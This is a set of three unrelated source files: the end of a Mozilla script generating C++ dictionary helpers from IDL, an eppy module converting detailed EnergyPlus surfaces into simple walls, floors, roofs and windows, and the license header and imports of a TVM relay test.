    `dictname` are unused (kept for interface compatibility).
    """
    for production in idl.productions:
        if production.kind != 'dictionary':
            continue
        pending = []
        base = production.base
        iface = production
        while base is not None and base not in dicts:
            iface = iface.idl.getName(iface.base, iface.location)
            dicts.append(base)
            pending.append(iface)
            base = iface.base
        pending.reverse()
        for ancestor in pending:
            write_cpp(ancestor, fd)
        if production.name not in dicts:
            dicts.append(production.name)
            write_cpp(production, fd)
def get_jsid(name):
    """Return the name of the static jsid variable for attribute `name`."""
    return "gDictionary_id_{0}".format(name)
def print_cpp_file(fd, conf):
    """Write the complete generated source (DictionaryHelpers.cpp) to `fd`.

    Relies on the module-level parser `p` and `options.incdirs` created in
    the __main__ block.
    """
    fd.write("/* THIS FILE IS AUTOGENERATED - DO NOT EDIT */\n\n")
    fd.write('#include "DictionaryHelpers.h"\n')
    includes = []
    for s in conf.special_includes:
        if not s in includes:
            includes.append(strip_end(s, ".h"))
    for d in conf.dictionaries:
        if not d[1] in includes:
            includes.append(strip_end(d[1], ".idl"))
    attrnames = []
    for d in conf.dictionaries:
        # Side effect: non-primitive attribute types are appended to
        # `includes` so their headers get pulled in below.
        idl = loadIDL(p, options.incdirs, d[1])
        collect_names_and_non_primitive_attribute_types(idl, d[0], attrnames, includes)
    for c in includes:
        if not c in conf.exclude_automatic_type_include:
            fd.write("#include \"%s.h\"\n" % c)
    fd.write("\nusing namespace mozilla::dom;\n\n")
    # One interned static jsid per distinct attribute name.
    for a in attrnames:
        fd.write("static jsid %s = JSID_VOID;\n"% get_jsid(a))
    fd.write("\n"
             "static bool\n"
             "InternStaticJSVal(JSContext* aCx, jsid &id, const char* aString)\n"
             "{\n"
             " if (JSString* str = JS_InternString(aCx, aString)) {\n"
             " id = INTERNED_STRING_TO_JSID(aCx, str);\n"
             " return true;\n"
             " }\n"
             " return false;\n"
             "}\n\n"
             "bool\n"
             "InternStaticDictionaryJSVals(JSContext* aCx)\n"
             "{\n"
             " JSAutoRequest ar(aCx);\n"
             " return\n")
    for a in attrnames:
        fd.write(" InternStaticJSVal(aCx, %s, \"%s\") &&\n"
                 % (get_jsid(a), a))
    fd.write(" true;\n")
    fd.write("}\n\n")
    dicts = []
    for d in conf.dictionaries:
        if not d[0] in set(dicts):
            idl = p.parse(open(findIDL(options.incdirs, d[1])).read(), d[1])
            idl.resolve(options.incdirs, p)
            print_cpp(idl, fd, conf, d[0], dicts)
def init_value(attribute):
    """Return the C++ initializer literal for `attribute`.

    With no IDL default value, a type-appropriate zero value is produced
    (string types initialize to nothing). With a default value, only the
    string types are supported; anything else raises IDLError.
    """
    realtype = attribute.realtype.nativeType('in').strip(' ')
    if attribute.defvalue is None:
        if realtype.endswith('*'):
            return "nullptr"
        if realtype == "bool":
            return "false"
        if "nsAString" in realtype or "nsACString" in realtype:
            return ""
        if "JS::Value" in realtype:
            return "JSVAL_VOID"
        return "0"
    if "nsAString" in realtype:
        return "NS_LITERAL_STRING(\"%s\")" % attribute.defvalue
    if "nsACString" in realtype:
        return "NS_LITERAL_CSTRING(\"%s\")" % attribute.defvalue
    # NOTE(review): IDLError is not defined in this file; presumably it
    # arrives via `from codegen import *` — confirm.
    raise IDLError("Default value is not supported for type %s" % realtype)
def write_header(iface, fd):
    """Emit the C++ class declaration for one dictionary interface."""
    attributes = [m for m in iface.members if isinstance(m, xpidl.Attribute)]
    fd.write("class %s" % iface.name)
    if iface.base is not None:
        fd.write(" : public %s" % iface.base)
    fd.write("\n{\npublic:\n")
    fd.write(" %s();\n" % iface.name)
    fd.write(" ~%s();\n\n" % iface.name)
    fd.write(" // If aCx or aVal is null, NS_OK is returned and \n"
             " // dictionary will use the default values. \n"
             " nsresult Init(JSContext* aCx, const jsval* aVal);\n")
    fd.write("\n")
    # One member declaration per IDL attribute.
    for member in attributes:
        fd.write(" %s;\n" % attributeVariableTypeAndName(member))
    fd.write("};\n\n")
def write_getter(a, iface, fd):
    """Emit C++ statements that read attribute `a` from the JS object into
    aDict, converting the JS value to the attribute's native type.

    The caller (write_cpp) declares the temporaries this code references
    (`v`, and `ccx` for nsIVariant).
    """
    realtype = a.realtype.nativeType('in')
    # JS::Value attributes are fetched directly into the dictionary member;
    # every other type goes through the shared temporary `v` first.
    if realtype.count("JS::Value"):
        fd.write(" NS_ENSURE_STATE(JS_GetPropertyById(aCx, aObj, %s, &aDict.%s));\n"
                 % (get_jsid(a.name), a.name))
    else:
        fd.write(" NS_ENSURE_STATE(JS_GetPropertyById(aCx, aObj, %s, &v));\n"
                 % get_jsid(a.name))
    # Per-type conversion from `v` to the native member.
    if realtype.count("bool"):
        fd.write(" JSBool b;\n")
        fd.write(" MOZ_ALWAYS_TRUE(JS_ValueToBoolean(aCx, v, &b));\n")
        fd.write(" aDict.%s = b;\n" % a.name)
    elif realtype.count("uint16_t"):
        fd.write(" uint32_t u;\n")
        fd.write(" NS_ENSURE_STATE(JS_ValueToECMAUint32(aCx, v, &u));\n")
        fd.write(" aDict.%s = u;\n" % a.name)
    elif realtype.count("int16_t"):
        fd.write(" int32_t i;\n")
        fd.write(" NS_ENSURE_STATE(JS_ValueToECMAInt32(aCx, v, &i));\n")
        fd.write(" aDict.%s = i;\n" % a.name)
    elif realtype.count("uint32_t"):
        fd.write(" NS_ENSURE_STATE(JS_ValueToECMAUint32(aCx, v, &aDict.%s));\n" % a.name)
    elif realtype.count("int32_t"):
        fd.write(" NS_ENSURE_STATE(JS_ValueToECMAInt32(aCx, v, &aDict.%s));\n" % a.name)
    elif realtype.count("uint64_t"):
        fd.write(" NS_ENSURE_STATE(JS::ToUint64(aCx, v, &aDict.%s));\n" % a.name)
    elif realtype.count("int64_t"):
        fd.write(" NS_ENSURE_STATE(JS::ToInt64(aCx, v, &aDict.%s));\n" % a.name)
    elif realtype.count("double"):
        fd.write(" NS_ENSURE_STATE(JS_ValueToNumber(aCx, v, &aDict.%s));\n" % a.name)
    elif realtype.count("float"):
        fd.write(" double d;\n")
        fd.write(" NS_ENSURE_STATE(JS_ValueToNumber(aCx, v, &d));")
        fd.write(" aDict.%s = (float) d;\n" % a.name)
    elif realtype.count("nsAString"):
        # Nullable strings accept null/undefined; others stringify.
        if a.nullable:
            fd.write(" xpc_qsDOMString d(aCx, v, &v, xpc_qsDOMString::eNull, xpc_qsDOMString::eNull);\n")
        else:
            fd.write(" xpc_qsDOMString d(aCx, v, &v, xpc_qsDOMString::eStringify, xpc_qsDOMString::eStringify);\n")
        fd.write(" NS_ENSURE_STATE(d.IsValid());\n")
        fd.write(" aDict.%s = d;\n" % a.name)
    elif realtype.count("nsIVariant"):
        fd.write(" nsCOMPtr<nsIVariant> d(already_AddRefed<nsIVariant>(XPCVariant::newVariant(ccx, v)));\n")
        fd.write(" NS_ENSURE_STATE(d);\n")
        fd.write(" aDict.%s = d;\n" % a.name)
    elif realtype.endswith('*'):
        # XPCOM interface pointer: unwrap the JS object to the native type.
        fd.write(" %s d;\n" % realtype)
        fd.write(" xpc_qsSelfRef ref;\n")
        fd.write(" nsresult rv = xpc_qsUnwrapArg<%s>(aCx, v, &d, &ref.ptr, &v);\n" % realtype.strip('* '))
        fd.write(" NS_ENSURE_SUCCESS(rv, rv);\n")
        fd.write(" aDict.%s = d;\n" % a.name)
    elif not realtype.count("JS::Value"):
        raise BaseException("Unsupported type %s found in dictionary %s" % (realtype, iface.name))
def write_cpp(iface, fd):
    """Emit the C++ definitions for one dictionary interface: constructor,
    destructor, the static <name>_InitInternal helper, and Init()."""
    attributes = []
    for member in iface.members:
        if isinstance(member, xpidl.Attribute):
            attributes.append(member)
    # Constructor with an initializer list: base class first, then every
    # attribute with its default from init_value().
    fd.write("%s::%s()" % (iface.name, iface.name))
    if iface.base is not None or len(attributes) > 0:
        fd.write(" :\n")
    if iface.base is not None:
        fd.write(" %s()" % iface.base)
        if len(attributes) > 0:
            fd.write(",\n")
    for i in range(len(attributes)):
        fd.write(" %s(%s)" % (attributes[i].name, init_value(attributes[i])))
        if i < (len(attributes) - 1):
            fd.write(",")
        fd.write("\n")
    fd.write("{")
    # Nullable attributes start out as void (null) strings.
    hasnullable = False
    for i in range(len(attributes)):
        if attributes[i].nullable:
            hasnullable = True
            fd.write("\n %s.SetIsVoid(true);" % attributes[i].name)
    if hasnullable:
        fd.write("\n")
    fd.write("}\n\n")
    fd.write("%s::~%s() {}\n\n" % (iface.name, iface.name))
    # <name>_InitInternal: chains to the base helper, then reads each
    # attribute present on the JS object via write_getter().
    fd.write("static nsresult\n%s_InitInternal(%s& aDict, JSContext* aCx, JSObject* aObj)\n" %
             (iface.name, iface.name))
    fd.write("{\n")
    if iface.base is not None:
        fd.write(" nsresult rv = %s_InitInternal(aDict, aCx, aObj);\n" %
                 iface.base)
        fd.write(" NS_ENSURE_SUCCESS(rv, rv);\n")
    fd.write(" JSBool found = PR_FALSE;\n")
    # Declare the temporaries write_getter() relies on, only if needed.
    needjsval = False
    needccx = False
    for a in attributes:
        if not a.realtype.nativeType('in').count("JS::Value"):
            needjsval = True
        if a.realtype.nativeType('in').count("nsIVariant"):
            needccx = True
    if needjsval:
        fd.write(" jsval v = JSVAL_VOID;\n")
    if needccx:
        fd.write(" XPCCallContext ccx(NATIVE_CALLER, aCx);\n")
        fd.write(" NS_ENSURE_STATE(ccx.IsValid());\n")
    for a in attributes:
        fd.write(" NS_ENSURE_STATE(JS_HasPropertyById(aCx, aObj, %s, &found));\n"
                 % get_jsid(a.name))
        fd.write(" if (found) {\n")
        write_getter(a, iface, fd)
        fd.write(" }\n")
    fd.write(" return NS_OK;\n")
    fd.write("}\n\n")
    # Public Init(): null aCx/aVal keeps defaults; non-object values other
    # than null/undefined are a type error.
    fd.write("nsresult\n%s::Init(JSContext* aCx, const jsval* aVal)\n" % iface.name)
    fd.write("{\n"
             " MOZ_ASSERT(NS_IsMainThread());\n"
             " if (!aCx || !aVal) {\n"
             " return NS_OK;\n"
             " }\n"
             " if (!aVal->isObject()) {\n"
             " return aVal->isNullOrUndefined() ? NS_OK : NS_ERROR_TYPE_ERR;\n"
             " }\n\n"
             " JSObject* obj = &aVal->toObject();\n"
             " nsCxPusher pusher;\n"
             " NS_ENSURE_STATE(pusher.Push(aCx, false));\n"
             " JSAutoRequest ar(aCx);\n"
             " JSAutoCompartment ac(aCx, obj);\n")
    fd.write(" return %s_InitInternal(*this, aCx, obj);\n}\n\n" %
             iface.name)
if __name__ == '__main__':
    # Command-line driver: parse options, load the config file(s), then emit
    # the header, the .cpp stub and/or the makedepend file as requested.
    from optparse import OptionParser
    o = OptionParser(usage="usage: %prog [options] configfile")
    o.add_option('-I', action='append', dest='incdirs', default=['.'],
                 help="Directory to search for imported files")
    o.add_option('-o', "--stub-output",
                 type='string', dest='stub_output', default=None,
                 help="Quick stub C++ source output file", metavar="FILE")
    o.add_option('--header-output', type='string', default=None,
                 help="Quick stub header output file", metavar="FILE")
    o.add_option('--makedepend-output', type='string', default=None,
                 help="gnumake dependencies output file", metavar="FILE")
    o.add_option('--cachedir', dest='cachedir', default=None,
                 help="Directory in which to cache lex/parse tables.")
    (options, filenames) = o.parse_args()
    if len(filenames) < 1:
        o.error("At least one config filename is needed.")
    filename = filenames[0]
    if options.cachedir is not None:
        if not os.path.isdir(options.cachedir):
            os.mkdir(options.cachedir)
        sys.path.append(options.cachedir)
    # Instantiate the parser.
    # NOTE: several functions above rely on this module-level `p`.
    p = xpidl.IDLParser(outputdir=options.cachedir)
    conf = readConfigFile(filename)
    # Optional second config: auto-append <Event>Init dictionaries.
    if (len(filenames) > 1):
        eventconfig = {}
        execfile(filenames[1], eventconfig)
        simple_events = eventconfig.get('simple_events', [])
        for e in simple_events:
            eventdict = ("%sInit" % e)
            eventidl = ("nsIDOM%s.idl" % e)
            conf.dictionaries.append([eventdict, eventidl]);
    if options.header_output is not None:
        outfd = open(options.header_output, 'w')
        print_header_file(outfd, conf)
        outfd.close()
    if options.stub_output is not None:
        # The stub output is the primary make target for --makedepend-output.
        make_targets.append(options.stub_output)
        outfd = open(options.stub_output, 'w')
        print_cpp_file(outfd, conf)
        outfd.close()
    if options.makedepend_output is not None:
        writeMakeDependOutput(options.makedepend_output)
| |
# Copyright (c) 2012 Santosh Philip
# =======================================================================
# Distributed under the MIT License.
# (See accompanying file LICENSE or copy at
# http://opensource.org/licenses/MIT)
# =======================================================================
"""from BUILDINGSURFACE:DETAILED and FENESTRATIONSURFACE:DETAILED make a wall
floor, celiling etc or a window"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# key fields:
# Name
# Surface Type
# key Floor
# key Wall
# key Ceiling
# key Roof
# Construction Name
# Zone Name
# Outside Boundary Condition
# key Adiabatic
# key Surface
# key Zone
# key Outdoors
# key Ground
# key GroundFCfactorMethod
# key OtherSideCoefficients
# key OtherSideConditionsModel
# key GroundSlabPreprocessorAverage
# key GroundSlabPreprocessorCore
# key GroundSlabPreprocessorPerimeter
# key GroundBasementPreprocessorAverageWall
# key GroundBasementPreprocessorAverageFloor
# key GroundBasementPreprocessorUpperWall
# key GroundBasementPreprocessorLowerWall
# Outside Boundary Condition Object
#
# 'FENESTRATIONSURFACE:DETAILED',
# Surface_Type
# key Window
# key Door
# key GlassDoor
# key TubularDaylightDome
# key TubularDaylightDiffuser
#
#
# 'BUILDINGSURFACE:DETAILED',
# (simple_surface, Surface_Type, Outside_Boundary_Condition)
# ----------------------------------------------------------
# ('WALL:EXTERIOR', Wall, Outdoors)
# ('WALL:ADIABATIC',Wall, Adiabatic)
# ('WALL:UNDERGROUND', Wall, s.startswith('Ground'))
# ('WALL:INTERZONE', Wall, Surface OR Zone)
# ('ROOF', Roof, None or Outdoor)
# ('CEILING:ADIABATIC', Ceiling, Adiabatic)
# ('CEILING:INTERZONE', Ceiling, Surface OR Zone or OtherSideCoefficients)
# ('FLOOR:GROUNDCONTACT', Floor, s.startswith('Ground'))
# ('FLOOR:ADIABATIC', Floor, Adiabatic)
# ('FLOOR:INTERZONE', Floor, Surface OR Zone or OtherSideCoefficients)
#
# 'FENESTRATIONSURFACE:DETAILED',
# (simple_surface, Surface_Type, Outside_Boundary_Condition)
# ----------------------------------------------------------
# ('WINDOW', Window, None)
# ('DOOR', Door, None)
class NotImplementedError(Exception):
    """Exception Object"""
    # NOTE(review): this shadows the builtin NotImplementedError inside this
    # module. Kept as-is because external code may import it by this name.
    pass
def bsdorigin(bsdobject, setto000=False):
    """return the origin of the surface"""
    # Deriving the real origin from the surface vertices is not implemented
    # yet; only the force-to-zero shortcut is available.
    if not setto000:
        raise NotImplementedError
    return (0, 0, 0)
def fsdorigin(fsdobject, setto000=False):
    """return the origin of the surface"""
    # Deriving the real origin from the surface vertices is not implemented
    # yet; only the force-to-zero shortcut is available.
    if not setto000:
        raise NotImplementedError
    return (0, 0)
def wallexterior(idf, bsdobject, deletebsd=True, setto000=False):
    """return a wall:exterior object if the bsdobject
    (buildingsurface:detailed) is an exterior wall, else None"""
    # ('WALL:EXTERIOR', Wall, Outdoors)
    if bsdobject.Surface_Type.upper() != "WALL":
        return None
    if bsdobject.Outside_Boundary_Condition.upper() != "OUTDOORS":
        return None
    newsurface = idf.newidfobject("WALL:EXTERIOR")
    newsurface.Name = bsdobject.Name
    newsurface.Construction_Name = bsdobject.Construction_Name
    newsurface.Zone_Name = bsdobject.Zone_Name
    newsurface.Azimuth_Angle = bsdobject.azimuth
    newsurface.Tilt_Angle = bsdobject.tilt
    origin = bsdorigin(bsdobject, setto000=setto000)
    newsurface.Starting_X_Coordinate = origin[0]
    newsurface.Starting_Y_Coordinate = origin[1]
    newsurface.Starting_Z_Coordinate = origin[2]
    newsurface.Length = bsdobject.width
    newsurface.Height = bsdobject.height
    if deletebsd:
        idf.removeidfobject(bsdobject)
    return newsurface
def walladiabatic(idf, bsdobject, deletebsd=True, setto000=False):
    """return a wall:adiabatic object if the bsdobject
    (buildingsurface:detailed) is an adiabatic wall, else None"""
    # ('WALL:ADIABATIC', Wall, Adiabatic)
    if bsdobject.Surface_Type.upper() != "WALL":
        return None
    if bsdobject.Outside_Boundary_Condition.upper() != "ADIABATIC":
        return None
    newsurface = idf.newidfobject("WALL:ADIABATIC")
    newsurface.Name = bsdobject.Name
    newsurface.Construction_Name = bsdobject.Construction_Name
    newsurface.Zone_Name = bsdobject.Zone_Name
    newsurface.Azimuth_Angle = bsdobject.azimuth
    newsurface.Tilt_Angle = bsdobject.tilt
    origin = bsdorigin(bsdobject, setto000=setto000)
    newsurface.Starting_X_Coordinate = origin[0]
    newsurface.Starting_Y_Coordinate = origin[1]
    newsurface.Starting_Z_Coordinate = origin[2]
    newsurface.Length = bsdobject.width
    newsurface.Height = bsdobject.height
    if deletebsd:
        idf.removeidfobject(bsdobject)
    return newsurface
def wallunderground(idf, bsdobject, deletebsd=True, setto000=False):
    """return a wall:underground object if the bsdobject
    (buildingsurface:detailed) is an underground wall, else None"""
    # ('WALL:UNDERGROUND', Wall, s.startswith('Ground'))
    if bsdobject.Surface_Type.upper() != "WALL":
        return None
    if not bsdobject.Outside_Boundary_Condition.upper().startswith("GROUND"):
        return None
    newsurface = idf.newidfobject("WALL:UNDERGROUND")
    newsurface.Name = bsdobject.Name
    newsurface.Construction_Name = bsdobject.Construction_Name
    newsurface.Zone_Name = bsdobject.Zone_Name
    newsurface.Azimuth_Angle = bsdobject.azimuth
    newsurface.Tilt_Angle = bsdobject.tilt
    origin = bsdorigin(bsdobject, setto000=setto000)
    newsurface.Starting_X_Coordinate = origin[0]
    newsurface.Starting_Y_Coordinate = origin[1]
    newsurface.Starting_Z_Coordinate = origin[2]
    newsurface.Length = bsdobject.width
    newsurface.Height = bsdobject.height
    if deletebsd:
        idf.removeidfobject(bsdobject)
    return newsurface
def wallinterzone(idf, bsdobject, deletebsd=True, setto000=False):
    """return a wall:interzone object if the bsdobject
    (buildingsurface:detailed) is an interzone wall, else None"""
    # ('WALL:INTERZONE', Wall, Surface OR Zone OR OtherSideCoefficients)
    if bsdobject.Surface_Type.upper() != "WALL":
        return None
    boundary = bsdobject.Outside_Boundary_Condition.upper()
    if boundary not in ("SURFACE", "ZONE", "OTHERSIDECOEFFICIENTS"):
        return None
    newsurface = idf.newidfobject("WALL:INTERZONE")
    newsurface.Name = bsdobject.Name
    newsurface.Construction_Name = bsdobject.Construction_Name
    newsurface.Zone_Name = bsdobject.Zone_Name
    obco = "Outside_Boundary_Condition_Object"
    newsurface[obco] = bsdobject[obco]
    newsurface.Azimuth_Angle = bsdobject.azimuth
    newsurface.Tilt_Angle = bsdobject.tilt
    origin = bsdorigin(bsdobject, setto000=setto000)
    newsurface.Starting_X_Coordinate = origin[0]
    newsurface.Starting_Y_Coordinate = origin[1]
    newsurface.Starting_Z_Coordinate = origin[2]
    newsurface.Length = bsdobject.width
    newsurface.Height = bsdobject.height
    if deletebsd:
        idf.removeidfobject(bsdobject)
    return newsurface
def roof(idf, bsdobject, deletebsd=True, setto000=False):
    """return a roof object if the bsdobject (buildingsurface:detailed) is
    a roof, else None"""
    # ('ROOF', Roof, None or Outdoor)
    if bsdobject.Surface_Type.upper() != "ROOF":
        return None
    if bsdobject.Outside_Boundary_Condition.upper() not in ("OUTDOORS", ""):
        return None
    newsurface = idf.newidfobject("ROOF")
    newsurface.Name = bsdobject.Name
    newsurface.Construction_Name = bsdobject.Construction_Name
    newsurface.Zone_Name = bsdobject.Zone_Name
    newsurface.Azimuth_Angle = bsdobject.azimuth
    newsurface.Tilt_Angle = bsdobject.tilt
    origin = bsdorigin(bsdobject, setto000=setto000)
    newsurface.Starting_X_Coordinate = origin[0]
    newsurface.Starting_Y_Coordinate = origin[1]
    newsurface.Starting_Z_Coordinate = origin[2]
    newsurface.Length = bsdobject.width
    newsurface.Width = bsdobject.height
    if deletebsd:
        idf.removeidfobject(bsdobject)
    return newsurface
def ceilingadiabatic(idf, bsdobject, deletebsd=True, setto000=False):
    """return a ceiling:adiabatic object if the bsdobject
    (buildingsurface:detailed) is an adiabatic ceiling, else None"""
    # ('CEILING:ADIABATIC', Ceiling, Adiabatic)
    if bsdobject.Surface_Type.upper() != "CEILING":
        return None
    if bsdobject.Outside_Boundary_Condition.upper() != "ADIABATIC":
        return None
    newsurface = idf.newidfobject("CEILING:ADIABATIC")
    newsurface.Name = bsdobject.Name
    newsurface.Construction_Name = bsdobject.Construction_Name
    newsurface.Zone_Name = bsdobject.Zone_Name
    newsurface.Azimuth_Angle = bsdobject.azimuth
    newsurface.Tilt_Angle = bsdobject.tilt
    origin = bsdorigin(bsdobject, setto000=setto000)
    newsurface.Starting_X_Coordinate = origin[0]
    newsurface.Starting_Y_Coordinate = origin[1]
    newsurface.Starting_Z_Coordinate = origin[2]
    newsurface.Length = bsdobject.width
    newsurface.Width = bsdobject.height
    if deletebsd:
        idf.removeidfobject(bsdobject)
    return newsurface
def ceilinginterzone(idf, bsdobject, deletebsd=True, setto000=False):
    """return a ceiling:interzone object if the bsdobject
    (buildingsurface:detailed) is an interzone ceiling, else None"""
    # ('CEILING:INTERZONE', Ceiling, Surface OR Zone OR OtherSideCoefficients)
    if bsdobject.Surface_Type.upper() != "CEILING":
        return None
    boundary = bsdobject.Outside_Boundary_Condition.upper()
    if boundary not in ("SURFACE", "ZONE", "OTHERSIDECOEFFICIENTS"):
        return None
    newsurface = idf.newidfobject("CEILING:INTERZONE")
    newsurface.Name = bsdobject.Name
    newsurface.Construction_Name = bsdobject.Construction_Name
    newsurface.Zone_Name = bsdobject.Zone_Name
    obco = "Outside_Boundary_Condition_Object"
    newsurface[obco] = bsdobject[obco]
    newsurface.Azimuth_Angle = bsdobject.azimuth
    newsurface.Tilt_Angle = bsdobject.tilt
    origin = bsdorigin(bsdobject, setto000=setto000)
    newsurface.Starting_X_Coordinate = origin[0]
    newsurface.Starting_Y_Coordinate = origin[1]
    newsurface.Starting_Z_Coordinate = origin[2]
    newsurface.Length = bsdobject.width
    newsurface.Width = bsdobject.height
    if deletebsd:
        idf.removeidfobject(bsdobject)
    return newsurface
def floorgroundcontact(idf, bsdobject, deletebsd=True, setto000=False):
    """return a floor:groundcontact object if the bsdobject
    (buildingsurface:detailed) is a ground-contact floor, else None"""
    # ('FLOOR:GROUNDCONTACT', Floor, s.startswith('Ground'))
    if bsdobject.Surface_Type.upper() != "FLOOR":
        return None
    if not bsdobject.Outside_Boundary_Condition.upper().startswith("GROUND"):
        return None
    newsurface = idf.newidfobject("FLOOR:GROUNDCONTACT")
    newsurface.Name = bsdobject.Name
    newsurface.Construction_Name = bsdobject.Construction_Name
    newsurface.Zone_Name = bsdobject.Zone_Name
    newsurface.Azimuth_Angle = bsdobject.azimuth
    newsurface.Tilt_Angle = bsdobject.tilt
    origin = bsdorigin(bsdobject, setto000=setto000)
    newsurface.Starting_X_Coordinate = origin[0]
    newsurface.Starting_Y_Coordinate = origin[1]
    newsurface.Starting_Z_Coordinate = origin[2]
    newsurface.Length = bsdobject.width
    newsurface.Width = bsdobject.height
    if deletebsd:
        idf.removeidfobject(bsdobject)
    return newsurface
def flooradiabatic(idf, bsdobject, deletebsd=True, setto000=False):
    """return a floor:adiabatic object if the bsdobject
    (buildingsurface:detailed) is an adiabatic floor, else None"""
    # ('FLOOR:ADIABATIC', Floor, Adiabatic)
    if bsdobject.Surface_Type.upper() != "FLOOR":
        return None
    if bsdobject.Outside_Boundary_Condition.upper() != "ADIABATIC":
        return None
    newsurface = idf.newidfobject("FLOOR:ADIABATIC")
    newsurface.Name = bsdobject.Name
    newsurface.Construction_Name = bsdobject.Construction_Name
    newsurface.Zone_Name = bsdobject.Zone_Name
    newsurface.Azimuth_Angle = bsdobject.azimuth
    newsurface.Tilt_Angle = bsdobject.tilt
    origin = bsdorigin(bsdobject, setto000=setto000)
    newsurface.Starting_X_Coordinate = origin[0]
    newsurface.Starting_Y_Coordinate = origin[1]
    newsurface.Starting_Z_Coordinate = origin[2]
    newsurface.Length = bsdobject.width
    newsurface.Width = bsdobject.height
    if deletebsd:
        idf.removeidfobject(bsdobject)
    return newsurface
def floorinterzone(idf, bsdobject, deletebsd=True, setto000=False):
    """Convert bsdobject (a BUILDINGSURFACE:DETAILED) into a FLOOR:INTERZONE.

    Returns the new simple object if the surface is an interzone floor
    (boundary condition Surface, Zone or OtherSideCoefficients), else None.
    When deletebsd is True the original detailed surface is removed.
    """
    # ('FLOOR:INTERZONE', Floor, Surface OR Zone OR OtherSideCoefficients)
    if bsdobject.Surface_Type.upper() != "FLOOR":
        return None
    interzone_conditions = ("SURFACE", "ZONE", "OTHERSIDECOEFFICIENTS")
    if bsdobject.Outside_Boundary_Condition.upper() not in interzone_conditions:
        return None
    newsurface = idf.newidfobject("FLOOR:INTERZONE")
    newsurface.Name = bsdobject.Name
    newsurface.Construction_Name = bsdobject.Construction_Name
    newsurface.Zone_Name = bsdobject.Zone_Name
    obco = "Outside_Boundary_Condition_Object"
    newsurface[obco] = bsdobject[obco]
    newsurface.Azimuth_Angle = bsdobject.azimuth
    newsurface.Tilt_Angle = bsdobject.tilt
    xyz = bsdorigin(bsdobject, setto000=setto000)
    newsurface.Starting_X_Coordinate = xyz[0]
    newsurface.Starting_Y_Coordinate = xyz[1]
    newsurface.Starting_Z_Coordinate = xyz[2]
    newsurface.Length = bsdobject.width
    newsurface.Width = bsdobject.height
    if deletebsd:
        idf.removeidfobject(bsdobject)
    return newsurface
def window(idf, fsdobject, deletebsd=True, setto000=False):
    """Convert fsdobject (a FENESTRATIONSURFACE:DETAILED) into a WINDOW.

    Returns the new WINDOW object, or None if fsdobject is not a window.
    When deletebsd is True the detailed surface is removed from the idf.
    """
    # ('WINDOW', Window, None)
    if fsdobject.Surface_Type.upper() != "WINDOW":
        return None
    newfen = idf.newidfobject("WINDOW")
    newfen.Name = fsdobject.Name
    newfen.Construction_Name = fsdobject.Construction_Name
    newfen.Building_Surface_Name = fsdobject.Building_Surface_Name
    newfen.Shading_Control_Name = fsdobject.Shading_Control_Name
    newfen.Frame_and_Divider_Name = fsdobject.Frame_and_Divider_Name
    newfen.Multiplier = fsdobject.Multiplier
    xz = fsdorigin(fsdobject, setto000=setto000)
    newfen.Starting_X_Coordinate = xz[0]
    newfen.Starting_Z_Coordinate = xz[1]
    newfen.Length = fsdobject.width
    newfen.Height = fsdobject.height
    if deletebsd:
        idf.removeidfobject(fsdobject)
    return newfen
def door(idf, fsdobject, deletebsd=True, setto000=False):
    """Convert fsdobject (a FENESTRATIONSURFACE:DETAILED) into a DOOR.

    Returns the new DOOR object, or None if fsdobject is not a door.
    When deletebsd is True the detailed surface is removed from the idf.
    """
    # ('DOOR', Door, None)
    if fsdobject.Surface_Type.upper() != "DOOR":
        return None
    newfen = idf.newidfobject("DOOR")
    newfen.Name = fsdobject.Name
    newfen.Construction_Name = fsdobject.Construction_Name
    newfen.Building_Surface_Name = fsdobject.Building_Surface_Name
    newfen.Multiplier = fsdobject.Multiplier
    xz = fsdorigin(fsdobject, setto000=setto000)
    newfen.Starting_X_Coordinate = xz[0]
    newfen.Starting_Z_Coordinate = xz[1]
    newfen.Length = fsdobject.width
    newfen.Height = fsdobject.height
    if deletebsd:
        idf.removeidfobject(fsdobject)
    return newfen
def glazeddoor(idf, fsdobject, deletebsd=True, setto000=False):
    """Convert fsdobject (a FENESTRATIONSURFACE:DETAILED) into a GLAZEDDOOR.

    Returns the new GLAZEDDOOR object, or None if fsdobject is not a
    glass door. When deletebsd is True the detailed surface is removed
    from the idf.
    """
    # ('GLAZEDDOOR', GlassDoor, None)
    if fsdobject.Surface_Type.upper() != "GLASSDOOR":
        return None
    newfen = idf.newidfobject("GLAZEDDOOR")
    newfen.Name = fsdobject.Name
    newfen.Construction_Name = fsdobject.Construction_Name
    newfen.Building_Surface_Name = fsdobject.Building_Surface_Name
    newfen.Shading_Control_Name = fsdobject.Shading_Control_Name
    newfen.Frame_and_Divider_Name = fsdobject.Frame_and_Divider_Name
    newfen.Multiplier = fsdobject.Multiplier
    xz = fsdorigin(fsdobject, setto000=setto000)
    newfen.Starting_X_Coordinate = xz[0]
    newfen.Starting_Z_Coordinate = xz[1]
    newfen.Length = fsdobject.width
    newfen.Height = fsdobject.height
    if deletebsd:
        idf.removeidfobject(fsdobject)
    return newfen
def simplesurface(idf, bsd, deletebsd=True, setto000=False):
    """Convert a BUILDINGSURFACE:DETAILED into the matching simple surface.

    Tries each specialised converter in turn and returns the first
    successful conversion, or None when no converter matches.
    """
    converters = (
        wallexterior,
        walladiabatic,
        wallunderground,
        wallinterzone,
        roof,
        ceilingadiabatic,
        ceilinginterzone,
        floorgroundcontact,
        flooradiabatic,
        floorinterzone,
    )
    for convert in converters:
        converted = convert(idf, bsd, deletebsd=deletebsd, setto000=setto000)
        if converted:
            return converted
    return None
def simplefenestration(idf, fsd, deletebsd=True, setto000=False):
    """Convert a FENESTRATIONSURFACE:DETAILED into a simple fenestration.

    Tries window, door and glazeddoor in turn; returns the first match,
    or None when fsd is none of these.
    """
    for convert in (window, door, glazeddoor):
        converted = convert(idf, fsd, deletebsd=deletebsd, setto000=setto000)
        if converted:
            return converted
    return None
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import tvm
import numpy as np
from tvm import relay
from tvm.relay.scope_builder import ScopeBuilder
from tvm.relay.testing.config import ctx_list
